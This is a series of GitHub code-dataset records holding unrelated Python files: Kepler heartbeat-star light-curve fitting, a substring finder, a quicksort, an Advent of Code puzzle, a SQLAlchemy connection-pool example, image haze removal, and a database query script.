self.ea2ta(ea)\n return ta\n\n def ta2t(self, ta):\n ea = self.ta2ea(ta)\n ma = self.ea2ma(ea)\n t = self.ma2t(ma)\n return t\n\n def getEclipseTime(self):\n tp = self.ta2t(np.pi / 2. - self.omega)\n ts = self.ta2t(3. * np.pi / 2. - self.omega)\n return tp, ts\n\n def fixFunc(self, ta):\n cor_val = self.p * np.sin(ta + self.q)\n return cor_val\n\n def modelFunc(self, t):\n #時間からmean anomalyを計算\n ma = self.t2ma(t)\n #mean anomalyからeccentric anomalyを計算\n ea = self.ma2ea(ma)\n #eccentric anomalyからtrue anomalyを計算\n ta = self.ea2ta(ea)\n #減光度を求める\n numerator = 1. - 3. * np.power(np.sin(self.inc), 2.) * np.power(np.sin(ta + self.omega), 2.)\n denominator = np.power((1. - np.power(self.ecc, 2.)) / (1. 
+ self.ecc * np.cos(ta)), 3.)\n        flux = self.S * numerator / denominator + self.C #+ self.fixFunc(ta)\n        return flux\n\n    def test(self, t):\n        #時間からmean anomalyを計算\n        ma = self.t2ma(t)\n        #mean anomalyからeccentric anomalyを計算\n        ea = self.ma2ea(ma)\n        #eccentric anomalyからtrue anomalyを計算\n        ta = self.ea2ta(ea)\n        #減光度を求める\n        numerator = 1. - 3. * np.power(np.sin(self.inc), 2.) * np.power(np.sin(ta - self.omega), 2.)\n        denominator = np.power((1. - np.power(self.ecc, 2.)) / (1. + self.ecc * np.cos(ta)), 3.)\n        flux = self.S * numerator / denominator + self.C\n        return flux, ta\n\n\nclass EclipseModel():\n    def __init__(self, ecc, inc, omega, t0, S, C, p, q, rp, a, q1, q2, fp):\n        self.ecc = ecc\n        self.inc = inc\n        self.omega = omega\n        self.rp = rp\n        self.a = a\n        self.q1 = q1\n        self.q2 = q2\n        self.fp = fp\n        self.params = None\n\n    def get_params(self, tp, ts):\n        self.params = batman.TransitParams()\n        #time of inferior conjunction\n        self.params.t0 = tp\n        #orbital period\n        self.params.per = per\n        #planet radius (in units of stellar radii)\n        self.params.rp = self.rp\n        #semi-major axis (in units of stellar radii)\n        self.params.a = self.a\n        #orbital inclination (in degrees)\n        self.params.inc = np.rad2deg(self.inc)\n        #eccentricity\n        self.params.ecc = self.ecc\n        #longitude of periastron (in degrees)\n        self.params.w = np.rad2deg(self.omega)\n        #limb darkening coefficients [u1, u2]\n        u1 = 2. * np.sqrt(self.q1) * self.q2\n        u2 = np.sqrt(self.q1) * (1. - 2. * self.q2)\n        self.params.u = [u1, u2]\n        #limb darkening model\n        self.params.limb_dark = \"quadratic\"\n        # #planet-to-star flux ratio\n        self.params.fp = self.fp\n        # #the central secondary eclipse time\n        self.params.t_secondary = ts\n\n    def primaryModel(self, t):\n        model = batman.TransitModel(self.params, t)\n        flux = model.light_curve(self.params)\n        return flux\n\n    def secondaryModel(self, t):\n        model = batman.TransitModel(self.params, t, transittype=\"secondary\")\n        flux = model.light_curve(self.params)\n        return flux\n\n    def getTrueAnomaly(self, t):\n        model = batman.TransitModel(self.params, t)\n        ta = model.get_true_anomaly()\n        return ta\n\n\nclass MCMC():\n    def __init__(self):\n        self.param_in = [0.2640, 1.392, -0.1398, 2.54017, 0.001593, 0.9994, 0.000455, 3.52, 0.13, 5.61, 0.78, 0.76, 0.001]\n        self.ndim = len(self.param_in)\n        self.nwalkers = 100\n        self.tot_chain = None\n        self.samples = None\n\n    def __lnprior__(self, ecc, inc, omega, t0, S, C, p, q, rp, a, q1, q2, fp):\n        if not 0. < ecc < 0.5:\n            return -np.inf\n        elif not 0. <= inc < np.pi / 2.:\n            return -np.inf\n        elif not -np.pi / 2. <= omega < np.pi / 2.:\n            return -np.inf\n        elif not 2.4 <= t0 < per:\n            return -np.inf\n        elif not 0. <= p < 0.001:\n            return -np.inf\n        elif not 0. < q <= 2 * np.pi:\n            return -np.inf\n        elif not 0. <= rp:\n            return -np.inf\n        elif not 0. <= a:\n            return -np.inf\n        elif not 0. <= q1 <= 1.:\n            return -np.inf\n        elif not 0. <= q2 <= 1.:\n            return -np.inf\n        elif not 0. 
<= fp:\n return -np.inf\n else:\n return 0.0\n\n def __lnlike__(self, param, x, y, yerr):\n hbm = HeartBeatModel(*param)\n tp, ts = hbm.getEclipseTime()\n em = EclipseModel(*param)\n em.get_params(tp, ts)\n model_y = hbm.modelFunc(x) * em.primaryModel(x) * em.secondaryModel(x)\n inv_sigma2 = 1.0 / (yerr ** 2)\n lnlike = -0.5 * (np.sum((y - model_y) ** 2 * inv_sigma2 - np.log(inv_sigma2)))\n if np.isnan(lnlike):\n return -np.inf\n else:\n return lnlike\n\n def lnprob(self, param, x, y, yerr):\n lp = self.__lnprior__(*param)\n if not np.isfinite(lp):\n return -np.inf\n return lp + self.__lnlike__(param, x, y, yerr)\n\n def execute(self, stack_time, stack_flux, stack_err):\n pos = [self.param_in + 1e-4 * np.random.randn(self.ndim) for i in range(self.nwalkers)]\n sampler = emcee.EnsembleSampler(self.nwalkers, self.ndim, self.lnprob, args=(stack_time, stack_flux, stack_err))\n sampler.run_mcmc(pos, 10000)\n self.samples = sampler.chain[:, 5000:9990, :].reshape((-1, self.ndim))\n self.tot_chain = sampler.chain.reshape((-1, self.ndim))\n\n def result(self):\n label = [\"$ecc$\", \"$inc$\", \"$omega$\", \"$t0$\", \"$S$\", \"$C$\", \"$p$\", \"$q$\", \"$rp$\", \"$a$\", \"$q1$\", \"$q2$\", \"$fp$\"]\n fig = corner.corner(self.samples, labels=label)\n fig.savefig(\"corner2.png\", bbox_inches=\"tight\", pad_inches=0.0)\n np.savez(\"C:\\\\Users\\\\tajiri tomoyuki\\\\school\\\\dat\\\\fitting\\\\fitting_chain2.npz\", self.tot_chain)\n print(self.param_in)\n print(self.samples[-1])\n\n\nclass LevenbergMarquardt():\n def __init__(self):\n self.m = None\n\n def getParamInfo(self):\n parinfo = [{\"name\":\"ecc\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"inc\", \"value\":0, \"fixed\":0, \"limited\":[1, 1], \"limits\":[-np.pi, np.pi]},\n {\"name\":\"omega\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[-np.pi / 2., np.pi / 2.]},\n {\"name\":\"t0\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"S\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"C\", \"value\":0., \"fixed\":0, \"limited\":[0, 0], \"limits\":[0., 0.]},\n {\"name\":\"p\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]},\n {\"name\":\"q\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[0., np.pi * 2.]},\n {\"name\":\"rp\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]},\n {\"name\":\"a\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]},\n {\"name\":\"q1\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[0., 1.]},\n {\"name\":\"q2\", \"value\":0., \"fixed\":0, \"limited\":[1, 1], \"limits\":[0., 1.]},\n {\"name\":\"fp\", \"value\":0., \"fixed\":0, \"limited\":[1, 0], \"limits\":[0., 0.]}]\n return parinfo\n\n def lightcurveFunc(self, p, fjac=None, x=None, y=None, err=None):\n hbm = HeartBeatModel(*p)\n tp, ts = hbm.getEclipseTime()\n em = EclipseModel(*p)\n em.get_params(tp, ts)\n model_y = hbm.modelFunc(x) * em.primaryModel(x) * em.secondaryModel(x)\n status = 0\n return [status, (y - model_y) / err]\n\n def execute(self, stack_time, stack_flux, stack_er):\n p0 = [0.2640, 1.392, -0.1398, 2.54017, 0.001593, 0.9994, 0.000455, 3.52, 0.13, 5.61, 0.78, 0.76, 0.001]\n parinfo = self.getParamInfo()\n fa = {\"x\":stack_time, \"y\":stack_flux, \"err\":stack_er}\n self.m = mpfit(self.lightcurveFunc, p0, functkw=fa, parinfo=parinfo)\n\n def result(self):\n #np.savez(\"C:\\\\Users\\\\tajiri tomoyuki\\\\school\\\\dat\\\\fitting\\\\LM.npz\", self.m)\n 
print(self.m.params)\n        print(self.m.perror)\n\n\nclass ImportData():\n    def __init__(self, sys_name, period):\n        self.sys_name = sys_name\n        self.period = period\n        self.time_org = np.array([])\n        self.flux_org = np.array([])\n        self.cdno_org = np.array([])\n        self.folded_time = None\n        self.stack_time = np.array([])\n        self.stack_flux = np.array([])\n        self.stack_err = np.array([])\n        self.datdir = \"C:\\\\Users\\\\tajiri tomoyuki\\\\school\\\\kepler\"\n\n    def loadData(self, normalize=True):\n        fitslist = glob.glob(os.path.join(self.datdir, self.sys_name, \"*llc.fits\"))\n        for fitspath in fitslist:\n            with fits.open(fitspath) as hdulist:\n                t = hdulist[\"LIGHTCURVE\"].data.field(\"TIME\")\n                f = hdulist[\"LIGHTCURVE\"].data.field(\"PDCSAP_FLUX\")\n                c = hdulist[\"LIGHTCURVE\"].data.field(\"CADENCENO\").astype(np.uint32)\n                if normalize == True:\n                    mid_val = np.nanmedian(f)\n                    f_mid = f / mid_val\n                    self.flux_org = np.hstack((self.flux_org, f_mid))\n                else:\n                    self.flux_org = np.hstack((self.flux_org, f))\n                self.time_org = np.hstack((self.time_org, t))\n                self.cdno_org = np.hstack((self.cdno_org, c))\n\n    def foldTime(self):\n        self.folded_time = np.mod(self.time_org, self.period)\n\n    def stack(self, dev=1000):\n        bin_size = self.period / dev\n        for i in range(dev):\n            t_min = i * bin_size\n            t_max = (i + 1) * bin_size\n            #一旦nanを-999に変更\n            self.folded_time[np.isnan(self.folded_time)] = -999\n            bin_flux = self.flux_org[np.where((t_min <= self.folded_time) & (self.folded_time < t_max))]\n            self.folded_time[self.folded_time == -999] = np.nan\n            mid_time = (bin_size * (i + 0.5))\n            mid_flux = np.nanmedian(bin_flux)\n            flux_std = np.nanstd(bin_flux)\n            self.stack_time = np.hstack((self.stack_time, mid_time))\n            self.stack_flux = np.hstack((self.stack_flux, mid_flux))\n            self.stack_err = np.hstack((self.stack_err, flux_std))\n\n    def exportStackData(self, dev):\n        self.loadData()\n        self.foldTime()\n        self.stack(dev=dev)\n        return self.stack_time, self.stack_flux, self.stack_err\n\n\ndef maskEclipse(stack_time, stack_flux, mask=\"all\"):\n    masked_flux = np.array([])\n    t1_init = 0.3\n    t1_fin = 0.44\n    f1_init = 0.\n    f1_len = 0\n    t2_init = 2.07\n    t2_fin = 2.21\n    f2_init = 0.\n    f2_len = 0\n    tmp_array = np.array([])\n    for t, f in zip(stack_time, stack_flux):\n        if t < t1_init:\n            masked_flux = np.hstack((masked_flux, f))\n        elif t1_init <= t < t1_fin:\n            if mask == \"all\":\n                if f1_init == 0.:\n                    f1_init = f\n                f1_len += 1\n            else:\n                masked_flux = np.hstack((masked_flux, f))\n        elif t1_fin <= t < t2_init:\n            if mask == \"all\":\n                if f1_init != 0.:\n                    tol = (f - f1_init) / (f1_len + 1)\n                    cor_array = np.arange(f1_init + tol, f + tol, tol)[0 : f1_len + 1]\n                    cor_array = cor_array + 7e-5 * np.random.randn(f1_len + 1)\n                    masked_flux = np.hstack((masked_flux, cor_array))\n                    f1_init = 0.\n                else:\n                    masked_flux = np.hstack((masked_flux, f))\n            else:\n                masked_flux = np.hstack((masked_flux, f))\n        elif t2_init <= t < t2_fin:\n            if f2_init == 0.:\n                f2_init = f\n            f2_len += 1\n        elif t2_fin <= t:\n            if f2_init != 0.:\n                tol = (f - f2_init) / (f2_len + 1)\n                cor_array = np.arange(f2_init + tol, f + tol, tol)[0 : f2_len + 1]\n                cor_array = cor_array + 7e-5 * np.random.randn(f2_len + 1)\n                masked_flux = np.hstack((masked_flux, cor_array))\n                f2_init = 0.\n            else:\n                masked_flux = np.hstack((masked_flux, f))\n    return masked_flux\n\ndef main():\n    data = ImportData(\"003766353\", 2.666965)\n    stack_time, stack_flux, stack_err = data.exportStackData(1000)\n    #masked_flux = maskEclipse(stack_time, stack_flux)\n    mcmc = MCMC()\n    mcmc.execute(stack_time, stack_flux, stack_err)\n    
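# result() saves the corner plot and the raw walker chain, then prints the final sample\n    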
mcmc.result()\n\ndef main2():\n    data = ImportData(\"003766353\", 2.666965)\n    stack_time, stack_flux, stack_err = data.exportStackData(1000)\n    lm = LevenbergMarquardt()\n    lm.execute(stack_time, stack_flux, stack_err)\n    lm.result()\n\ndef test():\n    param = {\n        \"ecc\": 0.2647,\n        \"inc\": 1.415,\n        \"omega\": -0.1381,\n        \"t0\": 2.540566,\n        \"S\": 0.001579,\n        \"C\": 0.99958,\n        \"p\": 0.000448996,\n        \"q\": 3.48413,\n        \"rp\": 0.1222,\n        \"a\": 6.01312,\n        \"q1\": 0.824589,\n        \"q2\": 1.,\n        \"fp\": 0.00085891\n    }\n    param = {\n        \"ecc\": 0.2665,\n        \"inc\": 1.5708,\n        \"omega\": -0.133,\n        \"t0\": 2.540964,\n        \"S\": 0.00153811,\n        \"C\": 1.00013668,\n        \"p\": 0.000455,\n        \"q\": 3.52,\n        \"rp\": 0.06053899,\n        \"a\": 10.0782672,\n        \"q1\": 0.953831,\n        \"q2\": 1.,\n        \"fp\": 0.000376788\n    }\n    data = ImportData(\"003766353\", 2.666965)\n    stack_time, stack_flux, stack_err = data.exportStackData(1000)\n    #masked_flux = maskEclipse(stack_time, stack_flux)\n    hbm = HeartBeatModel(**param)\n    tp, ts = hbm.getEclipseTime()\n    em = EclipseModel(**param)\n    em.get_params(tp, ts)\n    model_flux = hbm.modelFunc(stack_time) * em.primaryModel(stack_time) * em.secondaryModel(stack_time)\n    fig = plt.figure()\n    ax = fig.add_subplot(211)\n    ax.scatter(stack_time, stack_flux, c=\"red\", s=10, marker=\"o\")\n    ax.scatter(stack_time, model_flux, c=\"blue\", s=10, marker=\"o\")\n    ax1 = fig.add_subplot(212)\n    plt.ylim([-0.001, 0.001])\n    ax1.scatter(stack_time, stack_flux - model_flux, c=\"red\", s=10, marker=\"o\")\n    plt.show()\n\ndef test2():\n    param = {\n        \"ecc\": 0.23,\n        \"inc\": 0.84,\n        \"omega\": 0.1,\n        \"t0\": 2.565,\n        \"S\": 0.0028,\n        \"C\": 1.0002,\n        \"p\": 0.00052,\n        \"q\": 3.79,\n        \"rp\": 0.1,\n        \"a\": 15.,\n        \"q1\": 0.11,\n        \"q2\": 0.31,\n        \"fp\": 0.001\n    }\n    data = ImportData(\"003766353\", 2.666965)\n    stack_time, stack_flux, stack_err = data.exportStackData(1000)\n    #masked_flux = maskEclipse(stack_time, stack_flux)\n    hbm = HeartBeatModel(**param)\n    tp, ts = hbm.getEclipseTime()\n    #print(tp, ts)\n    em = EclipseModel(**param)\n    em.get_params(tp, ts)\n    ta1 = hbm.t2ta(stack_time)\n    #model_flux = hbm.modelFunc(stack_time)\n    ta2 = em.getTrueAnomaly(stack_time)\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.scatter(ta1, stack_flux, c=\"blue\", s=10, marker=\"o\")\n    ax.scatter(ta2, stack_flux, c=\"red\", s=10, marker=\"o\")\n    plt.show()\n\nif __name__ == \"__main__\":\n    #main2()\n    test()\n","repo_name":"tajiritomoyuki/Fitting","sub_path":"FitHeartBeatEclipse.py","file_name":"FitHeartBeatEclipse.py","file_ext":"py","file_size_in_byte":17261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"11072132342","text":"def find_all(a_string, sub):\n    result = []\n    k = 0\n    while k < len(a_string):\n        k = a_string.find(sub, k)\n        if k == -1:\n            return result\n        else:\n            result.append(k)\n            k += 1 #change to k += len(sub) to not search overlapping results\n    return result\n    \n","repo_name":"mars1198/bioinformatics","sub_path":"find_indexes_of_all_substings.py","file_name":"find_indexes_of_all_substings.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"6770507705","text":"def quickSort(alist):\r\n    quickSortHelper(alist,0,len(alist)-1)\r\n\r\ndef quickSortHelper(alist,first,last):\r\n    if first<last:\r\n        splitpoint = partition(alist,first,last)\r\n\r\n        quickSortHelper(alist,first,splitpoint-1)\r\n        quickSortHelper(alist,splitpoint+1,last)\r\n\r\ndef partition(alist,first,last):\r\n    pivotvalue = alist[first]\r\n\r\n    leftmark = first+1\r\n    rightmark = last\r\n\r\n    done = False\r\n    while not done:\r\n\r\n        while leftmark <= rightmark and alist[leftmark] <= pivotvalue:\r\n            leftmark = leftmark + 1\r\n\r\n        while alist[rightmark] >= pivotvalue and rightmark >= leftmark:\r\n            rightmark = rightmark -1\r\n\r\n        if rightmark < leftmark:\r\n            done = True\r\n        else:\r\n            temp = alist[leftmark]\r\n            alist[leftmark] = alist[rightmark]\r\n            
alist[rightmark] = temp\r\n\r\n temp = alist[first]\r\n alist[first] = alist[rightmark]\r\n alist[rightmark] = temp\r\n\r\n\r\n return rightmark\r\n\r\nalist = ['intermodalismo', 'azoinar', 'tostão', 'nitro', 'inflorescência', 'comprazimento', 'tentativa', 'amoestar', 'poesia', 'conta', 'supletivo', 'avante', 'vestidura', 'arbitragem', 'fouce', 'hizo',\r\n 'borgonhês', 'presumptivo', 'reabastecedor', 'equilibrar', 'dolosamente', 'liberador', 'reviramento', 'alambique', 'acredital', 'obstrução', 'embarcação', 'decodificador', 'aglutininas', 'pessoas', 'pineal',\r\n 'glicosúria', 'remailer', 'bairrista', 'monstrozinho', 'desnaturado', 'disselhe', 'tri-campeã', 'disserão', 'loudel', 'iletrado', 'motociclístico', 'orçar', 'degenerativo', 'observancia', 'geoestacionário',\r\n 'preferencia', 'cambialmente', 'unido', 'inositadamente', 'caos', 'constringir', 'jambu', 'núcelo', 'telejogo', 'corpora', 'telégrafo', 'endoscópio', 'vestibular', 'ilusório', 'vinil', 'micropartido', \r\n 'hip-hop','grandiloquência', 'desmineralização', 'ex-executivo', 'tolamente', 'supposto', 'autocrático', 'faltar', 'crocitar', 'autotanque', 'momentaneamente', 'argentar', 'eurocepticismo', 'morrão', \r\n 'perfuração','peleguismo', 'inflacionário', 'ilustradora', 'extra-muro', 'institucionalidade', 'demissionismo', 'repentista', 'sulfureto', 'detento', 'enfolhado', 'ro-ro', 'vacum', 'detalhista', \r\n 'maritimista', 'cel','não-realizar', 'windsurfista', 'tesourada', 'exemplificativamente', 'exógeno', 'atte', 'estremadamente', 'escurecer','peneira', 'ex-arcebispo', 'wizard', 'sanctorum', 'alevita',\r\n 'médico-paciente', 'intrometter','escovar', 'beco', 'digitalmente', 'rectroescavadora', 'am', 'isótopo', 'tamanca', 'apertado', 'óio', 'tresdobrar', 'domesticar', 'diminuir', 'vilão', 'farricoco',\r\n 'avantesma', 'afásico', 'anti-semita','entrae', 'garfo', 'pregado', 'louquinho', 'ensolarado', 'ferocidade', 'top-model', 'vacatio', 'céptico', 'repovoamento', 'auto-dissolver', 'bugiganga', 'percorrer',\r\n 'should', 'prendeo', 'universitaria', 'colorido','transfuga', 'rótulo', 'argumentativamente', 'ciganada','esfalfamento', 'promettar', 'escampar', 'inverídico', 'enlace', 'apr', 'qual', 'além-mar', \r\n 'bestinha', 'aliciador', 'limoeiro', 'conversão','quiosque', 'malferido', 'grenho', 'bulhão', 'lastrear', 'touchdown', 'sintrense', 'corniaberto', 'hhh', 'acometimento', 'grã-fino', 'espumante',\r\n 'louuor', 'sur', 'franchisado', 'fraco', 'nebrino','sacho', 'chaque', 'torc', 'brotar', 'público','cedilha', 'subholding', 'terceiro-oficial', 'mourisco', 'dramatículo', 'vale', 'maviosamente', \r\n 'monotonamente', 'moquear', 'queimar', 'enunciado','desmultiplicar', 'desfalecidamente', 'internacionalista', 'certezinha', 'não-associar', 'monotorização', 'ajoelhado', 'mingar', 'tetraneto', 'propria']\r\nquickSort(alist)\r\nprint(alist)","repo_name":"MirkosMartins/ComplexidadeAlgoritmos","sub_path":"Douglas Iracet/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14073438066","text":"# Advent of Code 2022 Day 18\n# Soln from: https://github.com/silentw0lf/advent_of_code_2022/blob/main/18/solve.py\n\nimport re\n\n#input file is x,y,z coords of 1*1*1 cubes\nwith open(\"Day18TestInput.txt\") as f:\n cubes = [tuple(map(int, re.findall(\"(\\d+)\", l))) for l in f.readlines()]\n\n# find smallest and largest values with a buffer of 1 each side\nminout = [min(c[i]-1 for c in cubes) for i in 
range(3)]\nmaxout = [max(c[i]+1 for c in cubes) for i in range(3)]\n\n\ndef in_space(cube):\n    # check whether this cube is in our space\n    # all() returns true if all the items in the list meet the condition\n    return all(minout[i] <= cube[i] <= maxout[i] for i in range(3))\n\n\ndef get_neighbors(cube):\n# work out what the cubes surrounding this one would be:\n    return [tuple(sum(x) for x in zip(cube, d)) for d in \\\n        [(1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]]\n\n\n# part 1\nexposed = 0\nfor cube in cubes:\n    for n in get_neighbors(cube):\n        if n not in cubes: #if the cube that would cover this face isn't in our set then this face is exposed\n            exposed += 1\n\n# part 2\nexposed_outside = 0\nseen = set()\nqueue = [tuple(maxout)]\nwhile queue:\n    curr_cube = queue.pop(0)\n    if curr_cube in cubes:\n        exposed_outside += 1\n        continue\n    if curr_cube not in seen:\n        seen.add(curr_cube)\n        for n in get_neighbors(curr_cube):\n            if in_space(n):\n                queue.append(n)\n\nprint(exposed)\nprint(exposed_outside)","repo_name":"sholden69/AdventOfCode2022","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"8205063192","text":"# -*- coding: utf-8 -*-\n\"\"\"Example of StaticPool.\"\"\"\nfrom contextlib import contextmanager\nimport datetime\nimport logging\nimport os\nimport sys\nimport time\nimport typing\n\nfrom sqlalchemy import Column, Integer, String, DateTime\nfrom sqlalchemy.orm import declarative_base\nimport sqlalchemy\nimport sqlalchemy.orm\n\n\nlogger: logging.Logger = logging.getLogger(__name__)\nstream_handler: logging.StreamHandler = logging.StreamHandler()\nstream_handler.setLevel(logging.DEBUG)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(stream_handler)\nlogger.propagate = False\nstream_handler.setFormatter(\n    logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')\n)\n\nBase = declarative_base()\n\n\nclass FruitsMenu(Base):\n    \"\"\"Fruits Menu.\"\"\"\n    __tablename__ = 'fruits_menu'\n\n    id = Column(Integer, primary_key=True)  # emits SERIAL\n    name = Column(String(16), unique=True)\n    price = Column(Integer)\n    # Default value is the creation time, not automatically updated\n    mod_time = Column(DateTime, server_default=sqlalchemy.sql.func.now())\n    __table_args__ = (\n        sqlalchemy.PrimaryKeyConstraint('id'),\n        {'schema': 'guest'}\n    )\n\n    def __init__(self, name, price):\n        self.name = name\n        self.price = price\n\n    def __str__(self):\n        return '{' + \"id: {}, name: '{}', price: {}, mod_time: '{}'\".format(\n            self.id, self.name, self.price, self.mod_time.isoformat()\n        ) + '}'\n\n    def to_dict(self):\n        \"\"\"Generate non-primitive dict.\"\"\"\n        return {\n            'name': self.name,\n            'price': self.price,\n            'mod_time': self.mod_time.isoformat()\n        }\n\n\ndef optional_int(\n    num_str: typing.Optional[str]\n) -> typing.Optional[int]:\n    \"\"\"Optional[str] to Optional[int].\"\"\"\n    if num_str is None:\n        return None\n    return int(num_str)\n\n\n@contextmanager\ndef create_engine(\n    driver_name: str\n) -> typing.Generator[sqlalchemy.engine.base.Engine, None, None]:\n    \"\"\"Create engine.\"\"\"\n    engine = sqlalchemy.create_engine(\n        sqlalchemy.engine.URL.create(\n            driver_name,\n            host=os.environ.get('PGHOST'),\n            port=optional_int(os.environ.get('PGPORT')),\n            database=os.environ.get('PGDATABASE'),\n            username=os.environ.get('PGUSER'),\n            password=os.environ.get('PGPASSWORD')\n        ),\n        poolclass=sqlalchemy.pool.StaticPool\n    )\n    yield engine\n    time.sleep(10)\n    
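# StaticPool keeps a single shared connection open until dispose() is called\n    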
print(f'{datetime.datetime.now()}: engine.dispose(): BEGIN')\n engine.dispose()\n print(f'{datetime.datetime.now()}: engine.dispose(): END')\n time.sleep(10)\n print(f'{datetime.datetime.now()}: process.exit()')\n\n\ndef main(driver_name: str):\n \"\"\"Run main.\"\"\"\n with create_engine(driver_name) as engine:\n t_0 = time.time()\n print(f'{datetime.datetime.now()}: sqlalchemy.orm.sessionmaker()()')\n session = sqlalchemy.orm.sessionmaker(\n autocommit=False, autoflush=False, bind=engine\n )()\n print(f'{datetime.datetime.now()}: session.query(): BEGIN')\n count = session.query(\n FruitsMenu\n ).count()\n t_1 = time.time()\n print(f'{datetime.datetime.now()}: session.query(): END')\n time.sleep(10)\n print(f'dt = {(t_1 - t_0):.3f}s; count={count}')\n\n\nif __name__ == '__main__':\n if sys.argv[1] in ['postgresql+pg8000', 'postgresql+psycopg2']:\n main(sys.argv[1])\n else:\n print(\n f\"usage: {sys.argv[0]} \"\n '{postgresql+pg8000|postgresql+psycopg2}',\n file=sys.stderr\n )\n\n# EOF\n","repo_name":"unmyr/python-examples","sub_path":"database/sqlalchemy-postgresql/src/sqlalchemy_pool_StaticPool.py","file_name":"sqlalchemy_pool_StaticPool.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29234111289","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage import io, color, exposure \nimport skimage.filters.rank as sfr\nfrom skimage.morphology import square #rectangular filter-kernel\n#from skimage.morphology import disk \t#circular filter-kernel\n\nimport cv2\n\nimport guide_filter as gf\n\n\n\n\n'''\n\tstep 1:\n\tgetting dark_channel by using min Filter to min_channel\n\tMin_channel defines as minimum of {r,g,b} in all pixel\n'''\ndef __calculate_dark_channel(image, rads):\n\t(row, col, channel) = image.shape\n\tMin_channel = np.zeros((row,col),'uint8')\n\tMin_channel = image.min(axis=2) \n\tdark_channel = sfr.minimum(Min_channel,square(rads))\n\n\treturn dark_channel\n\n'''\n\t- image : original image\n\t- dark : dark_channel image\n\t- limit : limit of A \n'''\ndef __calculate_atmospheric_light(image, dark, limit = 200):\n\thist = np.histogram(dark, bins=100)\n\tposition = np.where(dark>=hist[1][-2])\n\tA = np.zeros(3,dtype = 'double')\n\tfor i in range(image.shape[2]):\n\t\tA[i] = np.mean(image[position[0],position[1],i]) \n\t\tif A[i] >= limit:\n\t\t\tA[i] = limit\n\n\treturn A\n\n'''\n\tcalculating transmition t(x) with guide filter\n\t- image : orignal image\n\t- A : atmospheric light\n\t- rads : filter radius (default 15)\n\t- w : modification coefficient\n'''\ndef __calculate_transmition_image(image, A, rads, eps = 0.001, w = 0.95):\n\n\tIy = np.zeros(image.shape,'double')\n\tfor i in range(image.shape[2]):\n\t\tIy[:,:,i] = image[:,:,i]/A[i]\n\tImin_c = Iy.min(axis=2)\n\tpos = np.where(Imin_c > 1)\n\tImin_c[pos[0],pos[1]] = 1 / Imin_c[pos[0],pos[1]]\n\tImin_filter = sfr.minimum(Imin_c,square(rads))\n\trough_transmition = 1 - w * (Imin_filter/255.0)\n\torigin_gray = color.rgb2gray(image)\n\ttransmition_image = gf.guidefilter(origin_gray,rough_transmition,rads*4,eps)\n#\tio.imsave('../transmition.jpg',transmition_image)\n\n\treturn transmition_image\n\n\ndef __recover_no_foggy_image(image, transmition, A, gamma = 0.588):\n\tT = np.zeros((transmition.shape[0],transmition.shape[1],2))\n\tT[:,:,0] = np.full(transmition.shape,0.1)\n\tT[:,:,1] = transmition\n\tT_max = T.max(axis=2)\n\n\tJ_img = np.zeros(image.shape)\n\tA_scale = A/250.0\n\timg_scale = 
image/255.0\n\tfor i in range(image.shape[2]):\n\t\tJ_img[:,:,i] =A_scale[i] - (A_scale[i] - img_scale[:,:,i])/T_max\n\t\tp1 = np.where(J_img[:,:,i]>1)\n\t\tJ_img[p1[0],p1[1],i] = 1\n\t\tp2 = np.where(J_img[:,:,i]<0)\n\t\tJ_img[p2[0],p2[1],i] = 0\t\t\n\n\tJ_img_gamma = np.power(J_img/float(np.max(J_img)), gamma)\n\n\treturn J_img_gamma\n\ndef haze_removal(original_img, rads = 5):\n\toriginal = cv2.imread(original_img)\n\tdark_channel = __calculate_dark_channel(original, rads)\n\tA = __calculate_atmospheric_light(original, dark_channel)\n\ttransmition = __calculate_transmition_image(original,A,rads)\n\tJ_img = __recover_no_foggy_image(original,transmition,A)\n\n\treturn J_img\n\n'''\nif __name__ == '__main__':\n\n\tno_foggy_img = haze_removal('/home/xiaoqing/Project_git/night_image_enhance/input.jpg')\n\n\tplt.subplot(2,1,1)\n\tio.imshow(original_img)\n\tplt.subplot(2,1,2)\n\tio.imshow(no_foggy_img)\n\tio.show()\n'''\n\n\n","repo_name":"qingxiao1101/BG_Subtraction","sub_path":"haze_removal/haze_removal.py","file_name":"haze_removal.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26750383080","text":"#!/usr/bin/env python3\n\nimport psycopg2\nimport json\nfrom os.path import join\nimport os\nimport itertools\n\ndef config_reader(read_path):\n with open(read_path, 'r') as input_file:\n conf_file = json.load(input_file)\n\n return conf_file\n\n\ndef get_backends(cursor):\n cursor.execute(\"select distinct exec from perftest_2;\")\n backends = list(itertools.chain(*cursor.fetchall()))\n return backends\n\n\ndef get_algos(cursor):\n cursor.execute(\"select distinct algo_comp from perftest_2;\")\n algos = 